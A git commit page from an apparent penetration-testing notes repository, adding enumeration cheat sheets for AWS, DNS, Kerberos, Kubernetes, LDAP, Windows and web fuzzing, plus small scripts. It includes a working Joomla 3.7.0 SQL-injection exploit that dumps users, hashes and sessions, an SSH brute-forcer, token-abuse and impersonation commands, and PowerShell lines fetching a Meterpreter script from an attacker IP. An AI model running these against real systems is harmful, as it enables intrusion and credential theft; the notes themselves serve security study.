whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

restructured enumeration

This commit is contained in:
Stefan Friese 2022-11-13 01:16:26 +01:00
parent cfa5f355b7
commit 628cfd0a67
36 changed files with 1859 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

84
Enumeration/AWS.md Normal file
View File

@ -0,0 +1,84 @@
# AWS S3 Enumeration
## Usage
* [Regions](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html#concepts-available-segions)
* `--region`
### Simple Storage Service (S3)
* [S3](https://aws.amazon.com/s3/)
* Methods of access control are as follows
* [Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/bucket-policies.html)
* [S3 ACL](https://docs.aws.amazon.com/AmazonS3/latest/userguide/managing-acls.html)
* Scheme is
```sh
http://<bucketname>.s3.amazonaws.com/file.name
```
or
```sh
http://s3.amazonaws.com/BUCKETNAME/FILENAME.ext
```
* __List content of public bucket via__
```sh
aws s3 ls s3://<bucketname>/ --no-sign-request
```
* Download via `curl`, `wget` or `s3` cli via
```sh
aws s3 cp s3://<bucketname>/foo_public.xml . --no-sign-request
```
#### ACL
* `Anyone`, just `curl`
* `AuthenticatedUsers`, `s3` cli with aws key
## IAM
* Not necessarily used by s3
* Access key ID, starts with `AKIA` + 20 chars
* Secret access key
* Session token, `ASIA` + sessionToken
* Add credentials to profile via
```sh
aws configure --profile PROFILENAME
```
* Config and credentials is stored at `~/.aws`
* Sanity test profile via
```sh
aws s3 ls --profile PROFILENAME
```
* Find account ID to an access key
```sh
aws sts get-access-key-info --access-key-id AKIAEXAMPLE
```
* Find username to an access key
```sh
aws sts get-caller-identity --profile PROFILENAME
```
* Listing EC2 instances of an account
```sh
aws ec2 describe-instances --output text --profile PROFILENAME
```
* aws ec2 describe-instances --output text --profile PROFILENAME
```sh
aws ec2 describe-instances --output text --profile PROFILENAME
```
* In another region
```sh
aws ec2 describe-instances --output text --region us-east-1 --profile PROFILENAME
```
### AWS ARN
* Unique ID is create via the following scheme
```sh
arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>
```
### Secrets
```sh
aws secretsmanager help
aws secretsmanager list-secrets
ws secretsmanager get-secret-value --secret-id <Name> --region <region>
```

25
Enumeration/DNS.md Normal file
View File

@ -0,0 +1,25 @@
# DNS
## Subdomain Enumeration
* Get all the info via
```sh
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
* [subrake](https://github.com/hash3liZer/Subrake.git)
## Join a Domain
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
* Check domain by querying the subdomain's A record via dig/drill/nslookup

21
Enumeration/Docker Enum.md Normal file
View File

@ -0,0 +1,21 @@
# Docker Enumeration
## Save Images
* Save image and extract it
```sh
docker save -o image.tar <image-name>
tar -xf image.tar
```
* Run a container from the image and `printenv`
### Manifest
* Read the manifest inside the image extracted
```sh
jq . manifest.json
```
* Read the config JSON file mentioned in the manifest
* Inside this config file there are the shell commands used at building the image
* Snoop around after interesting files, especially inside the root dir in `layer.tar`

11
Enumeration/EnumScripts/another_port_scanner.py Normal file
View File

@ -0,0 +1,11 @@
#!/usr/bin/python3
import socket
host = "1.1.1.1"
portList = [21,22,53,80,443,3306,8443,8080]
for port in portList:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print("Port ", port, " is open")
except:
print("Port ", port, " is closed")

16
Enumeration/EnumScripts/arp_enum.py Executable file
View File

@ -0,0 +1,16 @@
#!/usr/bin/env python
from scapy.all import *
interface = "wls3"
ip_range = "192.168.179.0/24"
broadcastMac = "ff:ff:ff:ff:ff:ff"
packet = Ether(dst=broadcastMac)/ARP(pdst=ip_range)
ans, unans = srp(packet, timeout=2, iface=interface, inter=0.1)
for send, receive in ans:
print(receive.sprintf(r"%Ether.src% - %ARP.psrc%"))

16
Enumeration/EnumScripts/dir_enum.py Executable file
View File

@ -0,0 +1,16 @@
#!/usr/bin/env python
import requests
import sys
sub_dirs = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
sub_dirs = _f.read().splitlines()
for dir in sub_dirs:
dir_enum = f"http://{sys.argv[1]}/{dir}.html"
r = requests.get(dir_enum)
if r.status_code == 404:
pass
else:
print("Valid directory: ", dir_enum)

7
Enumeration/EnumScripts/file_downloader.py Executable file
View File

@ -0,0 +1,7 @@
#!/usr/bin/env python
import requests
url = "https://download.sysinternals.com/files/PSTools.zip"
r = requests.get(url, allow_redirects=True)
open("PSTools.zip", 'wb').write(r.content)

186
Enumeration/EnumScripts/joomblah.py Executable file
View File

@ -0,0 +1,186 @@
#!/usr/bin/python3
import requests
import sys
import re
import argparse
import os
import random
import time
import binascii
def extract_token(resp):
match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S)
if match is None:
print(" [!] Cannot find CSRF token")
return None
return match.group(1)
def parse_options():
parser = argparse.ArgumentParser(description='Jooma Exploit')
parser.add_argument('url', help='Base URL for Joomla site')
return parser.parse_args()
def build_sqli(colname, morequery):
return "(SELECT " + colname + " " + morequery + ")"
def joomla_370_sqli_extract(options, sess, token, colname, morequery):
sqli = build_sqli("LENGTH("+colname+")", morequery)
length = joomla_370_sqli(options, sess, token, sqli)
if not length:
return None
length = int(length)
maxbytes = 30
offset = 0
result = ''
while length > offset:
sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery)
value = joomla_370_sqli(options, sess, token, sqli)
if not value:
print(" [!] Failed to retrieve string for query:", sqli)
return None
value = binascii.unhexlify(value)
result += value
offset += len(value)
return result
def joomla_370_sqli(options, sess, token, sqli):
sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)"
data = {
'option': 'com_fields',
'view': 'fields',
'layout': 'modal',
'list[fullordering]': sqli_full,
token: '1',
}
resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False)
match = re.search(r'XPATH syntax error:\s*&#039;([^$\n]+)\s*&#039;\s*</bl', resp.text, re.S)
if match:
match = match.group(1).strip()
if match[0] != ':' and match[-1] != ':':
return None
return match[1:-1]
def extract_joomla_tables(options, sess, token):
tables = list()
first = False
offset = 0
while True:
result = joomla_370_sqli_extract(options, sess, token, "TABLE_NAME", "FROM information_schema.tables WHERE TABLE_NAME LIKE 0x257573657273 LIMIT " + str(offset) + ",1" )
if result is None:
if first:
print("[!] Failed to retrieve first table name!")
return False
break
tables.append(result)
print(" - Found table:", result)
first = False
offset += 1
return tables
def extract_joomla_users(options, sess, token, table_name):
users = list()
offset = 0
first = False
print(" - Extracting users from", table_name)
while True:
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(id,0x7c,name,0x7c,username,0x7c,email,0x7c,password,0x7c,otpKey,0x7c,otep)", "FROM %s ORDER BY registerDate ASC LIMIT %d,1" % (table_name, offset) )
if result is None:
if first:
print("[!] Failed to retrieve user from table!")
return False
break
result = result.split('|')
print(" [$] Found user",result)
first = False
offset += 1
users.append(result)
return users
def extract_joomla_sessions(options, sess, token, table_name):
sessions = list()
offset = 0
first = False
print(" - Extracting sessions from", table_name)
while True:
result = joomla_370_sqli_extract(options, sess, token, "CONCAT(userid,0x7c,session_id,0x7c,username)", "FROM %s WHERE guest = 0 LIMIT %d,1" % (table_name, offset) )
if result is None:
if first:
print("[!] Failed to retrieve session from table!")
return False
break
result = result.split('|')
print(" [$] Found session", result)
first = False
offset += 1
sessions.append(result)
return sessions
def pwn_joomla_again(options):
sess = requests.Session()
print(" [-] Fetching CSRF token")
resp = sess.get(options.url + "/index.php/component/users/?view=login")
token = extract_token(resp)
if not token:
return False
# Verify that we can perform SQLi
print(" [-] Testing SQLi")
result = joomla_370_sqli(options, sess, token, "128+127")
if result != "255":
print(" [!] Could not find SQLi output!")
return False
tables = extract_joomla_tables(options, sess, token)
for table_name in tables:
table_prefix = table_name[:-5]
extract_joomla_users(options, sess, token, table_name)
extract_joomla_sessions(options, sess, token, table_prefix + 'session')
return True
def print_logo():
clear = "\x1b[0m"
colors = [31, 32, 33, 34, 35, 36]
logo = """
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/\'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
"""
for line in logo.split("\n"):
sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
#time.sleep(0.05)
def main(base_url):
options = parse_options()
options.url = options.url.rstrip('/')
print_logo()
pwn_joomla_again(options)
if __name__ == "__main__":
sys.exit(main("http://192.168.10.100:8080/joomla"))

2
Enumeration/EnumScripts/netcat_port_scanner.sh Normal file
View File

@ -0,0 +1,2 @@
#!/usr/bin/env bash
nc -zv $1 1-65535

35
Enumeration/EnumScripts/port_enum.py Executable file
View File

@ -0,0 +1,35 @@
#!/usr/bin/env python
import sys
import socket
import pyfiglet
print(pyfiglet.figlet_format("Port Scanner"))
ip = sys.argv[1]
open_ports = []
ports = range(1,10000)
def probe_port(ip, port, result = 1):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.5)
r = sock.connect_ex((ip,port))
if r == 0:
result = r
sock.close()
except Exception as e:
pass
return result
for port in ports:
sys.stdout.flush()
response = probe_port(ip, port)
if response == 0:
open_ports.append(port)
if open_ports:
print("[+] Open Ports are: ")
print(sorted(open_ports))
else:
print("[-] No Open Ports")

5
Enumeration/EnumScripts/port_scanner.sh Normal file
View File

@ -0,0 +1,5 @@
#!/bin/bash
ports=(21 22 53 80 443 3306 8443 8080)
for port in ${ports[@]}; do
timeout 1 bash -c "echo \"Port Scan Test\" > /dev/tcp/$1/$port && echo $port is open || /dev/null"
done

38
Enumeration/EnumScripts/ssh_brute_force.py Executable file
View File

@ -0,0 +1,38 @@
#!/usr/bin/env python
import paramiko
import sys
import os
target = str(input("IP address: "))
username = str(input("Username: "))
password_file = str(input("Location of password file: "))
def ssh_connect(password, code=0):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target, port=22, username=username, password=password)
except paramiko.AuthenticationException:
code = 1
ssh.close()
return code
with open(password_file, 'rb') as _f:
for line in _f.readlines():
password = line.strip()
print(password)
try:
response = ssh_connect(password)
if response == 0 :
print("[+] Password Found: " + password.decode())
exit(0)
if response == 1:
print("[-] Nothing Found")
except Exception as e:
print(e)
pass

22
Enumeration/EnumScripts/subdomain_enum.py Executable file
View File

@ -0,0 +1,22 @@
#!/usr/bin/env python
import requests
import sys
subdomains = []
with open ("/home/whackx/Downloads/wordlist2.txt", 'r') as _f:
subdomains = _f.read().splitlines()
for sub in subdomains:
http_domain = f"http://{sub}.{sys.argv[1]}"
try:
requests.get(http_domain)
except requests.ConnectionError:
pass
else:
print("Valid domain: ", http_domain)

55
Enumeration/Kerberoast.md Normal file
View File

@ -0,0 +1,55 @@
# Kerberoast
## Usage
### List users
```sh
kerbrute userenum -d $DOMAIN --dc $TARGET_IP $USER_LIST
```
### Get Users
* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
```
### Find SPNs
```sh
GetUserSPNs.py -request <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
or
```sh
pyverview get-netuser -u <USER> -p <PASSWORD> -t <SUBDOMAIN> -d <DOMAIN>
```
### Further Intel
```sh
findDelegation.py -debug <DOMAIN>/<USER>:<PASSWORD> -dc-ip $TARGET_IP
```
### Check Found Users
* Use crackmapexec to check access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with
```sh
smbpasswd.py <user>@$TARGET_IP -newpass password123
```
### Impersonate
```sh
getST.py -spn <USER>/<SUBDOMAIN> -impersonate Administrator '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip $TARGET_IP
```
* Serviceticket is save as `Administrator.ccache`
* `export KRB5CCNAME=Administrator.ccache`
* After that dump secrets
```sh
secretsdump.py -k -no-pass <DOMAIN>
```

96
Enumeration/Kubernetes.md Normal file
View File

@ -0,0 +1,96 @@
## Kubernetes Enumeration
## Kubectl
* Get pods, `-A` for all namespaces
```sh
kubectl get pods -A
```
* Check mounted secret
```sh
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
```
* Intel about a secret, and output
```sh
kubectl describe secrets <secret>
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
```
### Abuse Token
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
* By change of an LFI extract the token and
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```
* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
```
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
```
#### Elevate Permissions with found token
* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
```sh
curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
```
* Find namespace and pods
```sh
kubectl get pods -A
```
* Find name of container inside the pod description under `ContainerStatuses/name`
```sh
kubectl get pod $POD -n $NAMESPACE -o yaml
```
* Interesting find in any high priv container are
```sh
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
```
* Enumerate again with the new found token
```sh
kubectl auth can-i --list
```
### Create Pods
* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh
kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```
### Start Pods
```sh
kubectl exec -it <podname> -n <namespace> -- /bin/bash
```
## Microk8s
* [microk8s repo](https://github.com/ubuntu/microk8s)
### Enumeration
```sh
microk8s kubectl get nodes
microk8s kubectl get services
microk8s kubectl get pods
microk8s kubectl get deployments -o wide
microk8s kubectl cluster-info
```

23
Enumeration/LDAP.md Normal file
View File

@ -0,0 +1,23 @@
# LDAP
## Get Domain
```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
```
* Use found namingcontexts DC
```sh
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>
```
* Authenticated LDAP Search
```sh
ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > outfile
```
## Domain Dump
* If a set of credentials are known via
```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
```
* Take a look at the genreated HTML files

37
Enumeration/Linux Enum.md Normal file
View File

@ -0,0 +1,37 @@
# Linux Basic Enumeration
```sh
less ~/.bash_history
```
```sh
cat /etc/*-release
cat /proc/version
uname -a
```
```sh
sudo -V
sudo -L
```
* Check if is writeable
```sh
vim /etc/passwd
vim /etc/hosts
```
```sh
crontab -l
```
* Find interesting files
```sh
find / -perm /6000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name "*.log" 2>/dev/null
find / -type f -name "*.bak" 2>/dev/null
find / -type f -name "*.conf" 2>/dev/null
```
* Open Sockets
```sh
lsof -i
netstat -natup
ss -natup
```

12
Enumeration/NFS.md Normal file
View File

@ -0,0 +1,12 @@
# NFS Enumeration
## Find Mounts
* `rpcinfo -p $TARGET_IP`
* `showmount -e $TARGET_IP`
## Mount
```sh
mount -t nfs $TARGET_IP /tmp/nfsfiles
```

13
Enumeration/Port Knocking.md Normal file
View File

@ -0,0 +1,13 @@
# Port Knocking
* Open filtered port behind a firewall by knocking nicely
## Usage
* `knockd`
```sh
knock <target-IP> <magicWords>
```
or
* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking)
* `nc -z`

11
Enumeration/RPClient.md Normal file
View File

@ -0,0 +1,11 @@
# rpcclient
```sh
rpcclient -U% $TARGET_IP
```
* Input commands, attributes count for the current user on the machine
```sh
enumdomusers
enumdomains
enumprivs
```

23
Enumeration/References.md Normal file
View File

@ -0,0 +1,23 @@
# Enumeration References
[enum4Linux](https://github.com/CiscoCXSecurity/enum4linux.git)
[kerbrute](https://github.com/ropnop/kerbrute.git)
## Checklists
[netbiosX' Checklists](https://github.com/netbiosX/Checklists.git)
## Domain Enumeration
[Subrake](https://github.com/hash3liZer/Subrake.git)
[Sublist3r](https://github.com/aboul3la/Sublist3r.git)
[gobuster](https://github.com/OJ/gobuster.git)
[RustScan](https://github.com/RustScan/RustScan.git)
## Container Enumeration
[deepce](https://github.com/stealthcopter/deepce.git)
## CMS
[Typo3Scan](https://github.com/whoot/Typo3Scan.git)

28
Enumeration/SNMP.md Normal file
View File

@ -0,0 +1,28 @@
# SNMP Enumeration
## snmpcheck
* [git repo](https://gitlab.com/kalilinux/packages/snmpcheck.git)
* Ruby script, clone and
```sh
cd snmpcheck
gem install snmp
chmod 775 snmpcheck-<version>.rb
```
```sh
./snmpcheck-<version>.rb $TARGET_IP -c <community-string>
```
## Onesixtyone
* Find community strings
```sh
onesixtyone $TARGET_IP -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt
```
* Query users
```
snmpwalk -v2c -c <community_string> $TARGET_IP 1.3.6.1.4.1.77.1.2.25
```

31
Enumeration/Shodan.md Normal file
View File

@ -0,0 +1,31 @@
# Shodan
## Checking found Autonomous System Number (ASN)
* Shodan does output ASN, not necessarily the IP of a small company. Search for
```h
asn:AS13335
```
* [ASN Check](https://dnschecker.org/asn-whois-lookup.php)
## Banner
* Example
```json
{
"data": "Moxa Nport Device",
"Status": "Authentication disabled",
"Name": "NP5232I_4728",
"MAC": "00:90:e8:47:10:2d",
"ip_str": "46.252.132.235",
"port": 4800,
"org": "Starhub Mobile",
"location": {
"country_code": "SG"
}
}
```
## Filter
* vulns
```sh
vuln:ms17-010
```

131
Enumeration/Websites.md Normal file
View File

@ -0,0 +1,131 @@
# Website Enumeration
* `robots.txt`
* [Favicon](https://wiki.owasp.org/index.php/OWASP_favicon_database), `curl` target and `md5sum`
* `sitemap.xml`
* Headers, `curl <site>` including `-I` or `-v` parameters
* Check Components of the website, like blog frameworks, shops.
* Wappalyzer
* Snapshots of the site via waybackmachine
* Check repos of the site
* Check buckets
* Fuzz
## URL Fuzzing
### Fuzz Faster U Fool
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt
```
* Fuzz dirs
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
```
* Fuzz files
```sh
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
```
#### Fuzz parameters
```sh
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 39
ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -fw 39
```
* Fuzz values
```sh
seq 0 255 | fuff -u 'http://<IP>/sqli-labs/Less-1/?id=FUZZ -c -w - -fw 33
```
* Fuzz Post Methods
```sh
ffuf -u http://<IP>/sqli-labs/Less-11/ -c -w /usr/share/seclists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded'
```
#### Fuzz Users and use Bruteforce
* Fuzz users and write file
```sh
ffuf -w /usr/share/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/signup -mr "username already exists" -o fuff.out
```
* Use users saved in `fuff.out` to bruteforce
```sh
ffuf -w userlist.txt:W1,/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://<targetURL>/customers/login -fc 200
```
#### Fuzz Subdomains
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```
or if the subdomains are listed in the target's host file
```sh
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.test.com" -u http://<target-IP> -fs 0
```
* Fuzz Vhosts & Server Blocks
```sh
ffuf -u http://FUZZ.test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 0
ffuf -u http://test.com -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H 'Host: FUZZ.test.com' -fs 0
```
#### Proxy
* `-replay-proxy <IP>` or `-x <ProxyIP>`
### Gobuster
[Repo](https://github.com/OJ/gobuster.git)
#### Directories
```sh
gobuster dir -u <URL> -w <wordlist>
```
#### DNS
```sh
gobuster dns -d <domainName> -w <wordlist> --show-cname --show-ips --resolver <dns-Server>
```
#### Vhosts
* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
```sh
gobuster vhost -u <URL> -w <wordlist>
```
#### FileExtension
```sh
-x
```
* Fuzz for files and file extensions
```sh
gobuster dir -u <URL> -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
```
#### Basic Auth
```sh
gobuster help dir
```
* `--username` and `--password`
* `dir -s` Accept HTTP Status
* `dir -k` Skip TLS Auth
* `dir -a` User Agent
#### Wordlists
```sh
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
```
### Wfuzz
* Fuzz parameters
```sh
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
```

3
Enumeration/Windows/BloodHound.md Normal file
View File

@ -0,0 +1,3 @@
# Bloodhound
* DNS

99
Enumeration/Windows/Event Log.md Normal file
View File

@ -0,0 +1,99 @@
# Logging
* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf)
* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm)
* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor)
* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630)
## Loglevel
|ID|Event Type|Description|
|--|----------|-----------|
|0|Error|An event that indicates a significant problem.|
|1|Warning|An event that is not necessarily significant.|
|2|Information|An event describing the successful operation of an application.|
|3|Success Audit|An event that records an audited security access attempt that is successful.|
|4|Failure Audit|An event that records an audited security access attempt that is failure.|
## Logrotation
```sh
C:\Windows\System32\winevt\Logs
```
* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties.
## Tools
* Event Viewer (GUI-based application)
* Wevtutil.exe (command-line tool)
* Get-WinEvent (PowerShell cmdlet)
### wevtutil.exe
```sh
wevtutil.exe /?
```
* Count logs
```sh
wevtutil.exe le | measure
```
* Read three most recent Application logs
```sh
wevtutil qe Application /c:3 /rd:true /f:text
```
### Get-WinEvent
* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1)
* List all the logs
```sh
Get-WinEvent -ListLog *
```
* Find string
```sh
Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' }
```
* Further filtering
```sh
Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' }
```
```sh
Get-WinEvent -ListProvider *Policy*
```
```sh
(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description
```
* Filter by hashtable values
```sh
Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' };
```
```sh
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
```
* Including __XPATH__
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]'
```
```sh
Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"'
```
```sh
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1
```
* Find login by username
```sh
Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"'
```
### Command Line Logging
* Enable PS Logging
```sh
Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell
```
* CLI Process Auditing -- ID 4688
```
Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation
```

72
Enumeration/Windows/Manual Enum.md Normal file
View File

@ -0,0 +1,72 @@
# Manual Windows Enumeration
## General Info
```sh
systeminfo
```
* Check installed updates
```sh
wmic qfe get Caption,Description
```
## Users
* `whoami /priv`
* `whoami /groups`
* `whoami /all`
* `net user`
* `net group`
* `net localgroup <groupname>`
* `net accounts`
* `net accounts /domain`
## Network Info
```sh
ipconfig
ipconfig /all
```
```sh
netstat -noba
```
```sh
arp -a
```
* Show shares
```sh
net share
```
## Services
```sh
net start
wmic service get name,version,vendor
```
### Non-Default Services
* Looking for non-default services:
```sh
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
```
* **Unquoted Service Path** Ideally there is a path without quotation
* Check which account the service the services run as
```sh
sc qc <ServiceName>
```
* Check if directory is writeable
```sh
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
```

303
Enumeration/Windows/Powershell.md Normal file
View File

@ -0,0 +1,303 @@
# Powershell Usage
## Get-Help
```
Get-Help Command-Name
```
* Show examples
```
Get-Help Command-Name -Examples
```
* Get-Command gets all the cmdlets installed on the current Computer.
```
Get-Command
```
```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```
## Passing Output via Pipe
* A pipe passes object including methods and attributes.
```
Verb-Noun | Get-Member
```
```
Get-Command | Get-Member -MemberType Method
```
## Creating Objects from Previous Cmdlets
```
Get-ChildItem | Select-Object -Property Mode, Name
```
* first - gets the first x object
* last - gets the last x object
* unique - shows the unique objects
* skip - skips x objects
## Filtering Objects
```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
* Where -operator is a list of the following operators:
* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value
## Sort Object
```
Verb-Noun | Sort-Object
```
```
Get-ChildItem | Sort-Object
```
## Finding a File
```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
```
```sh
Get-HotFix | Format-list | findstr <searchstring>
```
```sh
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
```
* Find backup files
```sh
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
```
* Find file contents
```sh
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
```
## Showing File Content
```
Get-Content 'C:\Program Files\interesting-file.txt'
```
* Indexing lines
```sh
(Get-Content -Path file.txt)[index]
```
* Search
```sh
Select-String <filename> -Pattern <pattern>
```
## Copy File Content
```sh
Copy-Item <sourcefile> <destfile>
```
## Count Lines of Output
As an example, count all cmdlets on the system
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```
## Count Words
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
```
## Checksum of File
```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```
## Current Working Directory
```
Get-Location
```
## File Metadata
```sh
ls | Format-List *
```
## Web Request
```sh
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
```
```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```
* Webrequest and execute in one go
```sh
